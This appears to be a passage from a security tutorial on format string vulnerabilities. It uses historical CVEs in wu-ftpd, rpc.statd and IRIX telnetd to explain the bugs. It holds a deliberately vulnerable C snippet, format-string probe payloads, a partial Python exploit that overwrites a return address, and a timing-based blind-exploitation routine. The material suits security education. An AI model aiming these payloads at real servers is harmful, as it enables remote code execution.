To make the concepts of format string attacks concrete, let's examine two real-world exploitation scenarios.
Example 1: Stack-based format string (wu-ftpd 2.6.0 style)
The wu-ftpd program is an FTP server, common on many Linux distributions. The wu-ftpd 2.6.0 format string vulnerability, known as CVE-2000-0573, is a critical flaw that allows remote attackers to execute arbitrary code with root privileges. The vulnerability lies in the lreply function, which fails to properly sanitize user input containing format specifiers before passing it to a string formatting function. The server incorrectly parses the user-supplied format string, allowing an attacker to inject special format specifiers (%s, %n, %x, etc.) into the command input. We'll examine the principles of this exploit with slightly simplified example:
void vulnerable_function(char *user_input) {
char buffer[512];
snprintf(buffer, sizeof(buffer), user_input);
buffer[sizeof(buffer) - 1] = '\0';
// Return address is on stack
}
Analysis
-
The format string is on the stack at a predictable offset.
-
It is limited by the buffer size (512 bytes).
-
We can reach our own string through stack popping.
Exploitation approach
-
Find the distance: Test with
AAAA%x%x%x%x%x%xand count until we see41414141. Suppose it's 4 positions (16 bytes) away -
Identify the target: Use
objdumpto find saved return address location. Suppose it's at 0xbffff710 -
Construct the exploit:
import struct # Target: write shellcode address to return address location retaddr_location = 0xbffff710 shellcode_address = 0xbffff800 # Convert to little-endian bytes addrs = struct.pack("<I", retaddr_location) + \ struct.pack("<I", retaddr_location + 1) + \ struct.pack("<I", retaddr_location + 2) + \ struct.pack("<I", retaddr_location + 3) # Stack popping: 4 positions stackpop = "%x" * 4 # Calculate padding for each byte of 0xbffff800 # Bytes: 0x00, 0xf8, 0xff, 0xbf (little-endian)
Key challenges
-
Null bytes in addresses complicate exploitation. They must be avoided because a null byte indicates an end of string in C.
-
The limited buffer size restricts padding options.
-
We need precise distance calculation.
Example 2: Blind exploitation (no output visible)
The rpc.statd progam is a server for remote procedure calls (RPC) that implements the Network Status and Monitor RPC protocol and is a part of the Network File System package. The logging code in this server uses the syslog function and passes it user-supplied data as the format string. This bug was registered as CVE-2000-0666.
A malicious user could create a format string that will inject executable code and overwrite a function's return address, forcing the program to execture the injected code.
A similar bug existed in the telnetd program on SGI IRIX operating systems. Telnetd is the server to which telnet requests connec. The vulnerability was registered as CVE-2000-0733 and was similar to the rpc.statd bug: the server calls the syslog function to log certain environment variables. An attacker could send a request to set a specific environment variable and the syslog call used the attacker-controlled input directly as the format string, neglecting to sanitize it.
When you cannot see the format function's output (e.g., it logs to syslog or a file you can't read), you can still exploit the vulnerability through timing attacks:
Technique
-
Use
%.NNNNNNuwith very large N to create delays -
Measure response time to determine if the format string was processed
-
Use
%nwrites to unmapped addresses to cause crashes (distinguishable from normal termination) -
Perform a binary search through the memory space to find valid write targets
Example timing-based distance discovery
def find_distance(target):
for distance in range(1, 100):
test_string = "AAAA" + "%x" * distance + "%.9999999u"
start_time = time.time()
send_to_target(test_string)
elapsed = time.time() - start_time
if elapsed > 2.0: # Significant delay indicates processing
return distance